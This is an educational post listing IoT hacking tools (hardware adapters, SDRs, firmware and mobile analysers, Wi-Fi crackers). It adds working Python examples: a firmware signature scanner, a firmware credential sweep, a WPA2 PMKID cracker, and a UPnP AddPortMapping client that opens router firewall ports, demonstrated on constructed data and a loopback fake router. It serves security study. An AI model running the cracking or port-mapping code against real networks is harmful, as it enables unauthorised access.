IOT HACKING


IoT hacking can be extremely effective: compromised devices are routinely herded into botnets that launch DDoS attacks capable of crippling infrastructure, systems, and daily life. The cybersecurity concerns around IoT devices are well known, and there is an inherent risk in connecting more and more devices to the internet and to each other.

@its_me_kali


IoT Vulnerabilities

The weakness classes below are taken from the OWASP IoT Top 10 (2018); the full list also includes Use of Insecure or Outdated Components, Insecure Default Settings, and Lack of Physical Hardening.

  • Weak, Guessable, or Hardcoded Passwords
  • Insecure Network Services
  • Insecure Ecosystem Interfaces
  • Lack of Secure Update Mechanism
  • Insufficient Privacy Protection
  • Insecure Data Transfer and Storage
  • Lack of Device Management

🍎Top IOT Hacking Tools:

🍏Adafruit FT232H Breakout

Adafruit FT232H Breakout is probably the smallest and cheapest device for interfacing with I2C, SPI, JTAG, and UART. The main downside to it is that the headers don’t come pre-soldered. It’s based on FT232H, which is the chip that Attify Badge, the Shikra, and Bus Blaster use (although the Bus Blaster uses the dual channel version, FT2232H). You can get it at https://www.adafruit.com/product/2264

🍏Aircrack-ng

Aircrack-ng is an open source suite of command line tools for Wi-Fi security testing. It supports packet capturing, replay attacks, and deauthentication attacks, as well as WEP and WPA/WPA2-PSK cracking. Its individual programs cover the different stages of an attack: airmon-ng puts the adapter into monitor mode, airodump-ng captures, aireplay-ng injects and deauthenticates, and aircrack-ng cracks. You can find all the tools at https://www.aircrack-ng.org/

🍏Alfa Atheros AWUS036NHA 

Alfa Atheros AWUS036NHA is a wireless (802.11 b/g/n) USB adapter that we use for Wi-Fi attacks. Atheros chipsets are known for supporting monitor mode and packet injection, both of which are necessary for conducting most Wi-Fi attacks. You can learn more about it at https://www.alfa.com.tw/products_detail/7.htm

🍏Android Debug Bridge

Android Debug Bridge (adb) is a command line tool for communicating with Android devices. We used it extensively to interact with vulnerable Android apps. Learn all about it at https://developer.android.com/studio/command-line/adb

🍏Arduino

Arduino is an inexpensive, easy-to-use, open source electronics platform that lets you program microcontrollers in the Arduino language (a C++ dialect with its own core libraries). We use the Arduino IDE to write a deliberately vulnerable program for the black pill microcontroller, an Arduino UNO as the controller on an I2C bus, and the Arduino toolchain to program the Heltec LoRa 32 development board as a LoRa sender. Arduino’s website is at https://www.arduino.cc/

🍏Attify Badge

Attify Badge is a hardware tool that can communicate with UART, 1-WIRE, JTAG, SPI, and I2C. It supports both 3.3 V and 5 V logic levels. It’s based on the FT232H, the chip used in the Adafruit FT232H Breakout, the Shikra, and Bus Blaster (although Bus Blaster uses the dual channel version, FT2232H). You can find the badge with pre-soldered headers at https://www.attify-store.com/products/attify-badge-uart-jtag-spi-i2c-pre-soldered-headers


🍏Beagle I2C/SPI Protocol Analyzer

The Beagle I2C/SPI Protocol Analyzer is a hardware tool for high performance monitoring of I2C and SPI buses. You can buy it at https://www.totalphase.com/products/beagle-i2cspi/

🍏Bettercap

Bettercap is an open source multi-tool written in Go. You can use it to perform reconnaissance for Wi-Fi, BLE, and wireless HID devices, as well as Ethernet man-in-the-middle attacks. We use it for BLE hacking. Download it at https://www.bettercap.org/

🍏BinaryCookieReader

BinaryCookieReader is a tool for decoding the binary cookie (.binarycookies) files that iOS apps store. Find it at https://github.com/as0ler/BinaryCookieReader/

🍏Binwalk

Binwalk is a tool for analyzing and extracting firmware. It identifies files and code embedded in firmware images by scanning for the signatures of formats commonly found in those images (such as archives, headers, bootloaders, Linux kernels, and filesystems), and with -e it extracts what it finds. We use Binwalk to analyze the firmware of a Netgear D600 router and to extract the filesystem of an IP webcam’s firmware. You can download it at https://github.com/ReFirmLabs/binwalk/
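
The core of what Binwalk does is a signature scan: look for known magic bytes at every offset, then sanity-check the hit before trusting it. The following is an added example (not Binwalk's code) that scans a constructed firmware image for a U-Boot uImage header, gzip data, and a Squashfs superblock, and validates the uImage header CRC so that a stray magic value in the padding is reported as a false positive rather than a second kernel. The image layout and the header field values are assumptions chosen for the demonstration.

```python
"""Added example: a minimal binwalk-style signature scan over a constructed
firmware image. Illustrative code, not binwalk itself."""
import gzip
import struct
import zlib

# Magic bytes for a few formats commonly found inside firmware images.
SIGNATURES = [
    (b"\x27\x05\x19\x56", "uImage header"),
    (b"\x1f\x8b\x08", "gzip compressed data"),
    (b"hsqs", "Squashfs filesystem, little-endian"),
    (b"sqsh", "Squashfs filesystem, big-endian"),
]

UIMAGE_FMT = ">IIIIIIIBBBB32s"  # 64-byte U-Boot legacy image header, big-endian


def build_uimage_header(payload: bytes, name: bytes = b"constructed kernel") -> bytes:
    """Build a valid uImage header: hcrc is the CRC32 of the header with hcrc zeroed."""
    hdr = struct.pack(UIMAGE_FMT, 0x27051956, 0, 0, len(payload),
                      0x80000000, 0x80000000, zlib.crc32(payload) & 0xFFFFFFFF,
                      5, 2, 2, 1, name)  # os=Linux, arch=ARM, type=kernel, comp=gzip
    hcrc = zlib.crc32(hdr) & 0xFFFFFFFF
    return hdr[:4] + struct.pack(">I", hcrc) + hdr[8:]


def uimage_header_valid(image: bytes, offset: int) -> bool:
    """Verify the header CRC; a matching magic alone is not proof of a real header."""
    hdr = image[offset:offset + 64]
    if len(hdr) < 64:
        return False
    stored = struct.unpack(">I", hdr[4:8])[0]
    zeroed = hdr[:4] + b"\x00\x00\x00\x00" + hdr[8:]
    return (zlib.crc32(zeroed) & 0xFFFFFFFF) == stored


def scan_firmware(image: bytes):
    """Return [(offset, description, note)] for every signature match, sorted by offset."""
    hits = []
    for magic, desc in SIGNATURES:
        start = 0
        while (off := image.find(magic, start)) != -1:
            note = ""
            if desc == "uImage header":
                note = ("header CRC ok" if uimage_header_valid(image, off)
                        else "header CRC mismatch (false positive)")
            hits.append((off, desc, note))
            start = off + 1
    return sorted(hits)


def build_sample_image() -> bytes:
    """Constructed firmware image: uImage header plus gzip kernel at 0x100, a Squashfs
    magic at 0x1000, and a bare uImage magic with no valid header at 0x2000 as a decoy."""
    kernel = gzip.compress(b"constructed kernel image " * 40)
    image = b"\xff" * 0x100 + build_uimage_header(kernel) + kernel
    image = image.ljust(0x1000, b"\x00") + b"hsqs" + b"\x00" * 60
    image = image.ljust(0x2000, b"\x00") + b"\x27\x05\x19\x56" + b"\x00" * 60
    return image


if __name__ == "__main__":
    # Same three columns binwalk prints: decimal offset, hex offset, description.
    for off, desc, note in scan_firmware(build_sample_image()):
        print(f"{off:<12}0x{off:<10X}{desc} {note}".rstrip())
```

Run it and compare the output with `binwalk` on a real image: the scan reports the same kind of offset table, and the CRC check is the sort of validation that separates a real header from coincidental bytes.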

🍏BladeRF

BladeRF is an SDR platform, similar to HackRF One, LimeSDR, and USRP. There are two versions of it. The newer and more expensive bladeRF 2.0 micro supports a wider frequency range of 47 MHz to 6 GHz. You can learn more about bladeRF products at https://www.nuand.com/

🍏Burp Suite

Burp Suite is the standard tool used for the security testing of web applications. It includes a proxy server, web vulnerability scanner, spider, and other advanced features, all of which you can expand with Burp extensions. You can download the Community Edition free of charge from https://portswigger.net/burp/

🍏Bus Blaster

Bus Blaster is a high-speed JTAG debugger compatible with OpenOCD. It’s based on the dual-channel FT2232H chip. We use Bus Blaster to interface with JTAG on an STM32F103 target device. Documentation is at http://dangerousprototypes.com/docs/Bus_Blaster.

🍏Bus Pirate

Bus Pirate is an open source multi-tool for programming, analyzing, and debugging microcontrollers. It supports bus modes, such as bitbang, SPI, I2C, UART, 1-Wire, raw-wire, and even JTAG with special firmware. You can find more about it at http://dangerousprototypes.com/docs/Bus_Pirate.

🍏CatWAN USB Stick

CatWAN USB Stick is an open source USB stick designed as a LoRa/LoRaWAN transceiver. We use it as a sniffer to capture LoRa traffic between the Heltec LoRa 32 and the LoStik. You can buy it at https://electroniccats.com/store/catwan-usb-stick/

🍏ChipWhisperer

The ChipWhisperer project is a tool for conducting side channel power analysis and glitching attacks against hardware targets. It includes open source hardware, firmware, and software and has a variety of boards and example target devices for practicing. You can buy it at https://www.newae.com/chipwhisperer/

🍏CircuitPython

CircuitPython is a beginner-friendly, open source fork of MicroPython, a version of Python optimized to run on microcontrollers. We use CircuitPython to program the CatWAN USB stick as a LoRa sniffer. Its website is at https://circuitpython.org/

🍏Clutch

Clutch is a tool for dumping decrypted IPAs from a jailbroken iOS device: App Store binaries are encrypted on disk, so Clutch reads the decrypted code pages out of the running process’s memory. Get it at https://github.com/KJCracks/Clutch/

🍏CubicSDR

CubicSDR is a cross-platform SDR application. We use it to convert the radio spectrum into a digital stream that we can analyze. You can find it at https://github.com/cjcliffe/CubicSDR/


🍏Dex2jar

Dex2jar is a tool for converting DEX files, the bytecode format inside an Android Package, to JAR files, which standard Java decompilers can then open. We use it to decompile an APK. You can download it at https://github.com/pxb1988/dex2jar/


🍏DROZER

Drozer is a security testing framework for Android. We used it to perform dynamic analysis on a vulnerable Android app. You can get it at https://github.com/FSecureLABS/drozer/.

🍏FIRMADYNE

FIRMADYNE is a tool for emulating and dynamically analyzing Linux-based embedded firmware. We use FIRMADYNE to emulate the firmware of a Netgear D600 router. You can find the source code and documentation for FIRMADYNE at https://github.com/firmadyne/firmadyne/.

🍏Firmware Analysis and Comparison Tool (FACT)

FACT is a tool for automating the firmware analysis process by unpacking firmware files and, among other things, searching for sensitive information such as credentials, cryptographic material, and more. You can find it at https://github.com/fkie-cad/FACT_core/.
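
Once Binwalk has extracted a root filesystem, the next step is the kind of sweep FACT automates: walking the tree for account entries with crackable or empty password hashes, shipped private keys, and credentials hardcoded in scripts and binaries (the first item on the OWASP list above). The following is an added example, not FACT's own code; it builds a small constructed rootfs in a temporary directory and scans it. File names, the placeholder hash string, and the credential patterns are assumptions for the demonstration.

```python
"""Added example: FACT-style post-extraction scan of a firmware root filesystem for
credentials and key material. Illustrative code, not FACT's own; the rootfs is constructed."""
import re
import shutil
import tempfile
from pathlib import Path

HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                 "$y$": "yescrypt", "$2": "bcrypt"}
CRED_PATTERNS = [
    re.compile(r"(?i)\b(?:passw(?:or)?d|pwd|secret|api[_-]?key|token)\s*[=:]\s*['\"]?([^'\"\s]+)"),
    re.compile(r"(?:-u|--user)\s+([^\s:]+:[^\s]+)"),  # curl/wget style user:pass
    re.compile(r"[a-z]+://[^\s/]+:[^\s@/]+@"),        # credentials embedded in a URL
]
SKIP_DIRS = {"proc", "sys", "dev"}   # pseudo-filesystems, never firmware content
MAX_FILE = 4 * 1024 * 1024


def classify_account_line(line: str):
    """Classify one /etc/passwd or /etc/shadow line; None means nothing to report."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        return None
    user, h = fields[0], fields[1]
    if h == "":
        return (user, "EMPTY PASSWORD (login without a password)")
    if h == "x" or h.startswith(("*", "!")):
        return None  # hash lives in shadow, or account is locked
    for prefix, name in HASH_PREFIXES.items():
        if h.startswith(prefix):
            return (user, f"{name} hash (crackable offline)")
    if len(h) == 13:
        return (user, "DES crypt hash (weak, crackable offline)")
    return (user, "unknown hash format")


def scan_rootfs(root) -> list:
    """Return sorted, de-duplicated (relative path, category, detail) findings."""
    root = Path(root)
    findings = set()
    for path in root.rglob("*"):
        rel = path.relative_to(root).as_posix()
        if (not path.is_file() or path.is_symlink() or rel.split("/")[0] in SKIP_DIRS
                or path.stat().st_size > MAX_FILE):
            continue
        text = path.read_text(errors="replace")
        if rel in ("etc/passwd", "etc/shadow"):
            for line in text.splitlines():
                hit = classify_account_line(line)
                if hit:
                    findings.add((rel, "account", f"{hit[0]}: {hit[1]}"))
        if "-----BEGIN" in text and "PRIVATE KEY-----" in text:
            findings.add((rel, "private-key", "PEM private key shipped in firmware"))
        for pattern in CRED_PATTERNS:
            for m in pattern.finditer(text):
                findings.add((rel, "credential", m.group(0).strip()))
    return sorted(findings)


def build_sample_rootfs() -> Path:
    """Constructed rootfs with the usual suspects; the shadow hash is a placeholder string."""
    root = Path(tempfile.mkdtemp(prefix="rootfs-"))
    files = {
        "etc/passwd": "root:x:0:0:root:/root:/bin/sh\nadmin:x:1000:1000::/home/admin:/bin/sh\n",
        "etc/shadow": "root:$1$ab12cd34$PLACEHOLDERHASHxxxxxxxxxxx:18000:0:99999:7:::\n"
                      "admin::18000:0:99999:7:::\n"
                      "nobody:*:18000:0:99999:7:::\n",
        "etc/ssl/private/device.key": "-----BEGIN RSA PRIVATE KEY-----\n"
                                      "MIIEconstructedkeymaterial\n-----END RSA PRIVATE KEY-----\n",
        "etc/init.d/S50cloud": '#!/bin/sh\nAPI_KEY="c0nstructed-api-key"\n'
                               "curl -u admin:admin123 http://127.0.0.1/update\n",
        "usr/bin/agent": "\x7fELF\nconfig http://svc:Pa55w0rd@cloud.example.invalid/api\n",
        "proc/cpuinfo": "password = should-be-skipped\n",
    }
    for rel, content in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(content)
    return root


if __name__ == "__main__":
    sample = build_sample_rootfs()
    try:
        for rel, category, detail in scan_rootfs(sample):
            print(f"{category:<12}{rel:<28}{detail}")
    finally:
        shutil.rmtree(sample)
```

Every finding maps back to an OWASP item: the empty and md5crypt entries are "Weak, Guessable, or Hardcoded Passwords" (hand the hash to John the Ripper), the shipped key is "Insecure Data Transfer and Storage", and the credentials in the init script and the agent binary are what an attacker pulls from any unit of the same model.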

🍏Frida

Frida is a dynamic binary instrumentation framework used for analyzing running processes and generating dynamic hooks. We use it to bypass jailbreak detection in an iOS app and root detection in an Android app. We also use it to hack the buttons that control a smart treadmill. You can learn all about it at https://frida.re/

🍏FTDI FT232RL

FTDI FT232RL is a USB-to-serial UART adapter. We use it to interface with the UART port on the black pill microcontroller. We use the one at https://www.amazon.com/Adapter-Serial-Converter-Development-Projects/dp/B075N82CDL/, but there are cheaper alternatives, too.

🍏GATTTool 

Generic Attribute Profile Tool (gatttool) is used for discovering, reading, and writing BLE attributes. We use it to demonstrate various BLE attacks. gatttool is part of BlueZ, which you’ll find at http://www.bluez.org/. Note that recent BlueZ releases mark it deprecated and only build it when configured with --enable-deprecated, so on a current distribution you may have to build it yourself or use the GATT menu in bluetoothctl instead.

🍏GDB

GDB (the GNU Debugger) is a portable, mature, feature-complete debugger that supports a wide array of programming languages. We use it together with OpenOCD to exploit a device through SWD: OpenOCD exposes a GDB remote stub (port 3333 by default), and GDB attaches to it with target remote. You can find more about it at https://www.gnu.org/software/gdb/

🍏Ghidra

Ghidra is a free and open source reverse-engineering tool developed by the National Security Agency (NSA). It’s often compared with IDA Pro, which is closed source and costly but has features that Ghidra doesn’t. Download Ghidra at https://github.com/NationalSecurityAgency/ghidra/

🍏HackRF One

HackRF One is a popular, open source SDR hardware platform. It supports radio signals from 1 MHz to 6 GHz. You can use it as a stand-alone tool or as a USB 2.0 peripheral. Similar tools include bladeRF, LimeSDR, and USRP. HackRF supports only half-duplex communication, whereas the other tools support full-duplex communication. You can learn more about it from Great Scott Gadgets at https://greatscottgadgets.com/hackrf/one/

🍏Hashcat

Hashcat is a fast password recovery tool that can leverage CPUs and GPUs to accelerate its cracking speed. We use it to recover a WPA2 PSK. Its website is at https://hashcat.net/hashcat/

🍏Hcxdumptool

Hcxdumptool is a tool for capturing packets from wireless devices. We use it to capture Wi-Fi traffic, which we then analyze to crack a WPA2 PSK using the PMKID attack. Unlike a classic handshake capture, the PMKID attack needs no connected client: the PMKID is sent by the AP itself in the first EAPOL message of the 4-way handshake. Get it from https://github.com/ZerBea/hcxdumptool/

🍏Hcxtools

Hcxtools is a suite of tools for converting packets from captures to formats compatible with tools like Hashcat or John the Ripper for cracking. We use hcxpcapngtool from it to convert the capture into Hashcat’s 22000 format when cracking a WPA2 PSK with the PMKID attack. Get it from https://github.com/ZerBea/hcxtools/
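
The three entries above (Hashcat, Hcxdumptool, Hcxtools) are one pipeline, and the math behind it fits in a few lines. The following is an added example, not code from any of those projects: it derives the PMK from a passphrase the way WPA2-Personal does, computes the PMKID the AP leaks, formats it as the 22000 line hcxpcapngtool would produce for Hashcat, and then runs the offline dictionary attack in pure Python. The SSID, MAC addresses, passphrase, and wordlist are constructed.

```python
"""Added example: the WPA2 PMKID attack end to end. Illustrative code, not hcxtools or
hashcat. The capture values (SSID, MACs, passphrase, wordlist) are constructed."""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """IEEE 802.11: PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_22000_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Hashcat -m 22000 record for a PMKID-only capture (type 01), the layout
    hcxpcapngtool writes: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***"""
    return "WPA*01*%s*%s*%s*%s***" % (pmkid.hex(), ap_mac.hex(), sta_mac.hex(),
                                      ssid.encode().hex())


def crack_pmkid(target: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, wordlist):
    """Offline dictionary attack: one PBKDF2 and one HMAC per candidate, no client needed.
    Returns the recovered passphrase or None."""
    for candidate in wordlist:
        pmkid = compute_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(pmkid, target):
            return candidate
    return None


# Constructed "capture": what hcxdumptool would pull from the AP's first EAPOL message.
SSID = "IoT-Lab"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
TRUE_PASSPHRASE = "sunflower42"          # unknown to the attacker in a real engagement
CAPTURED_PMKID = compute_pmkid(derive_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC)
WORDLIST = ["password", "12345678", "iotlab2020", "sunflower42", "letmein99"]


def demo():
    """Format the capture for hashcat and recover the PSK from the constructed wordlist."""
    line = hashcat_22000_line(CAPTURED_PMKID, AP_MAC, STA_MAC, SSID)
    return line, crack_pmkid(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, WORDLIST)


if __name__ == "__main__":
    line, found = demo()
    print("hashcat -m 22000 input:", line)
    print("recovered PSK:", found)
```

The cost of the attack is entirely in PBKDF2 (4096 SHA-1 rounds per candidate), which is why the real job goes to Hashcat on a GPU; the script is the reference you can check a capture conversion against, and it shows why only the SSID and the two MACs are needed alongside the PMKID.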

🍏Heltec LoRa 32

Heltec LoRa 32 is a low-cost ESP32-based development board for LoRa. We use it to send LoRa radio traffic. You can get it at https://heltec.org/project/wifi-lora-32/

🍏Hydrabus

Hydrabus is another open source hardware tool that supports modes such as raw-wire, I2C, SPI, JTAG, CAN, PIN, NAND Flash, and SMARTCARD. It is used for debugging, analyzing, and attacking devices over the supported protocols. You’ll find Hydrabus at https://hydrabus.com/

🍏IDA Pro

IDA Pro is the most popular disassembler for binary analysis and reverse engineering. The commercial version is at http://www.hex-rays.com/, and a freeware version is available at http://www.hex-rays.com/products/ida/support/download_freeware.shtml. For a free and open source alternative to IDA Pro, take a look at Ghidra.

🍏JADX

JADX is a DEX to Java decompiler. It lets you easily view Java source code from Android DEX and APK files. You can download it at https://github.com/skylot/jadx/

🍏JTAGulator

JTAGulator is an open source hardware tool that assists in identifying on-chip debugging (OCD) interfaces from test points, vias, or component pads on a target device. You can find more information about how to use and purchase JTAGulator at http://www.jtagulator.com/

🍏John the Ripper

John the Ripper is the most popular free and open source cross-platform password cracker. It supports dictionary attacks and a brute-force mode against a wide variety of hashed password formats. We use it often to crack Unix shadow hashes pulled from IoT devices. Its website is at https://www.openwall.com/john/

🍏LimeSDR

LimeSDR is a low-cost, open source SDR platform that integrates with Snappy Ubuntu Core, allowing you to download and use existing LimeSDR apps. Its frequency range is 100 kHz to 3.8 GHz. You can get it at https://www.crowdsupply.com/lime-micro/limesdr/

🍏LLDB

LLDB is a modern, open source debugger and is part of the LLVM project. It specializes in debugging C, Objective-C, and C++ programs. We use it to exploit the iGoat mobile app. Find it at https://lldb.llvm.org/.

🍏LoStik

LoStik is an open source USB LoRa device. We use it as the receiver of LoRa radio traffic. You can get it at https://ronoth.com/lostik/

🍏Miranda

Miranda is a tool for attacking UPnP devices. We use Miranda to punch a hole through the firewall of a vulnerable UPnP-enabled OpenWrt router: the router’s WANIPConnection service accepts an AddPortMapping request from anyone on the LAN, with no authentication. Miranda resides at https://code.google.com/archive/p/mirandaupnptool/
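
What Miranda does under the hood is a three-step exchange: SSDP discovery to find the gateway, a fetch of its description to learn the control URL, and a SOAP AddPortMapping call. The following is an added example, not Miranda's code, that builds each message and then runs the SOAP step against a fake Internet Gateway Device served on loopback, so the whole exchange (both sides) runs offline. The control URL path, the LAN addresses, and the SSDP reply used in the usage note are assumptions.

```python
"""Added example: the UPnP IGD AddPortMapping exchange that tools like Miranda drive to
open a hole in a router's firewall. Illustrative code, not Miranda's own. The router is
stood in for by a fake IGD control endpoint on loopback (an assumption, like the
/ctl/IPConn path and the 192.168.1.x addresses)."""
import threading
import urllib.request
import xml.etree.ElementTree as ET
from http.server import BaseHTTPRequestHandler, HTTPServer

WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


def build_msearch(st: str = WANIP, mx: int = 2) -> bytes:
    """Step 1: SSDP discovery datagram, sent to 239.255.255.250:1900 over UDP."""
    return ("M-SEARCH * HTTP/1.1\r\n"
            "HOST: 239.255.255.250:1900\r\n"
            'MAN: "ssdp:discover"\r\n'
            f"MX: {mx}\r\n"
            f"ST: {st}\r\n\r\n").encode()


def parse_ssdp_response(data: bytes) -> dict:
    """Step 2: headers of the unicast SSDP reply; LOCATION is the device description URL,
    from which the control URL for WANIPConnection is read."""
    head = data.split(b"\r\n\r\n", 1)[0].decode(errors="replace")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def build_add_port_mapping(ext_port: int, proto: str, int_port: int, int_client: str,
                           desc: str = "added-example", lease: int = 0) -> bytes:
    """Step 3: SOAP body for AddPortMapping on WANIPConnection:1 (lease 0 = permanent)."""
    return (f'<?xml version="1.0"?>'
            f'<s:Envelope xmlns:s="{SOAP_NS}" '
            f's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            f'<s:Body><u:AddPortMapping xmlns:u="{WANIP}">'
            f'<NewRemoteHost></NewRemoteHost><NewExternalPort>{ext_port}</NewExternalPort>'
            f'<NewProtocol>{proto}</NewProtocol><NewInternalPort>{int_port}</NewInternalPort>'
            f'<NewInternalClient>{int_client}</NewInternalClient><NewEnabled>1</NewEnabled>'
            f'<NewPortMappingDescription>{desc}</NewPortMappingDescription>'
            f'<NewLeaseDuration>{lease}</NewLeaseDuration>'
            f'</u:AddPortMapping></s:Body></s:Envelope>').encode()


def add_port_mapping(control_url: str, ext_port: int, proto: str,
                     int_port: int, int_client: str) -> int:
    """POST the action to the control URL; HTTP 200 means the mapping was installed."""
    req = urllib.request.Request(
        control_url, method="POST",
        data=build_add_port_mapping(ext_port, proto, int_port, int_client),
        headers={"Content-Type": 'text/xml; charset="utf-8"',
                 "SOAPAction": f'"{WANIP}#AddPortMapping"'})
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # never via a proxy
    with opener.open(req, timeout=5) as resp:
        return resp.status


class FakeIGD(BaseHTTPRequestHandler):
    """Stand-in for a router whose control URL needs no authentication (the vulnerable pattern)."""
    mappings = []

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        action = self.headers.get("SOAPAction", "").strip('"')
        if self.path != "/ctl/IPConn" or action != f"{WANIP}#AddPortMapping":
            self.send_response(404)
            self.end_headers()
            return
        args = ET.fromstring(body).find(".//u:AddPortMapping", {"u": WANIP})
        FakeIGD.mappings.append({child.tag: (child.text or "") for child in args})
        reply = (f'<?xml version="1.0"?><s:Envelope xmlns:s="{SOAP_NS}"><s:Body>'
                 f'<u:AddPortMappingResponse xmlns:u="{WANIP}"/></s:Body></s:Envelope>').encode()
        self.send_response(200)
        self.send_header("Content-Type", 'text/xml; charset="utf-8"')
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args):  # keep the example quiet
        pass


def demo():
    """Run the SOAP step against the fake IGD: expose LAN host 192.168.1.50:22 on WAN port 2222."""
    FakeIGD.mappings.clear()
    server = HTTPServer(("127.0.0.1", 0), FakeIGD)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        control_url = f"http://127.0.0.1:{server.server_address[1]}/ctl/IPConn"
        status = add_port_mapping(control_url, 2222, "TCP", 22, "192.168.1.50")
    finally:
        server.shutdown()
        server.server_close()
    return status, list(FakeIGD.mappings)


if __name__ == "__main__":
    print(demo())
```

Against a real gateway, `build_msearch()` goes out over a UDP socket, `parse_ssdp_response()` gives you the LOCATION header, and the control URL comes from the `controlURL` element of the WANIPConnection service in that description; the SOAP step is then exactly `add_port_mapping()`. The fix on the device side is the one the fake IGD lacks: do not expose WANIPConnection without authentication, and never on the WAN interface.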

🍏Mobile Security Framework (MobSF)

MobSF is a tool for performing both static and dynamic analysis of mobile app binaries. Get it at https://github.com/MobSF/Mobile-Security-Framework-MobSF/

🍏Ncrack

Ncrack is a high-speed network authentication cracking tool developed under the Nmap suite of tools. Ncrack is hosted at https://nmap.org/ncrack/

🍏Nmap 

Nmap is probably the most popular free and open source tool for network discovery and security auditing. The Nmap suite includes Zenmap (a GUI for Nmap), Ncat (a network debugging tool and modern implementation of netcat), Nping (a packet generation tool, similar to Hping), Ndiff (for comparing scan results), the Nmap Scripting Engine (NSE; for extending Nmap with Lua scripts), Npcap (a packet sniffing library based on WinPcap/Libpcap), and Ncrack (a network authentication cracking tool). You’ll find the Nmap suite of tools at https://nmap.org/

🍏OpenOCD

OpenOCD is a free and open source tool for debugging ARM, MIPS, and RISC-V systems through JTAG and SWD. We use OpenOCD to interface with our target device (the black pill) through SWD and exploit it with the help of GDB. You can learn more about it at http://openocd.org/

🍏Otool

Otool is the object-file-displaying tool for macOS environments. It’s part of the Xcode package, which you can access at https://developer.apple.com/downloads/index.action.

🍏OWASP Zed Attack Proxy

OWASP Zed Attack Proxy (ZAP) is an open source, web application security scanner that the OWASP community maintains. It’s a completely free alternative to Burp Suite, although it doesn’t have the same number of advanced features. You can find it at https://www.zaproxy.org/

🍏Pholus

Pholus is an mDNS and DNS-SD security assessment tool. Download it from https://github.com/aatlasis/Pholus

🍏Qark

Qark is a tool designed to scan Android applications for vulnerabilities. Download it from https://github.com/linkedin/qark/

🍏QEMU

QEMU is an open source emulator for hardware virtualization, featuring full system and user mode emulation. In IoT hacking, it’s useful for emulating firmware binaries. Firmware analysis tools, such as FIRMADYNE, rely on QEMU. Its website is at https://www.qemu.org/

🍏Shikra

Shikra is a hardware hacking tool that claims to overcome the shortcomings of Bus Pirate, allowing not only debugging, but also attacks such as bit banging or fuzzing. It supports JTAG, UART, SPI, I2C, and GPIO. It’s based on FT232H, the chip used in Attify Badge, Adafruit FT232H Breakout, and Bus Blaster (Bus Blaster uses the dual channel version FT2232H). You can get it at https://int3.cc/products/the-shikra/

🍏VoIP Hopper

VoIP Hopper is an open source tool for conducting VLAN hopping security tests. VoIP Hopper can imitate the behavior of a VoIP phone in Cisco, Avaya, Nortel, and Alcatel-Lucent environments. We use it to spoof Cisco Discovery Protocol (CDP) traffic so that the switch treats our port as a phone and admits it to the voice VLAN. You can download it at http://voiphopper.sourceforge.net/.

🍏Wireshark

Wireshark is an open source network packet analyzer and the most popular free tool for packet capturing. You can download it from https://www.wireshark.org/

🍏Yersinia

Yersinia is an open source tool for performing Layer 2 attacks. We used Yersinia to send DTP packets and conduct a switch spoofing attack. You can find it at https://github.com/tomac/yersinia/


Thank you. This post is for educational purposes only!

🦁By Its_me_kali

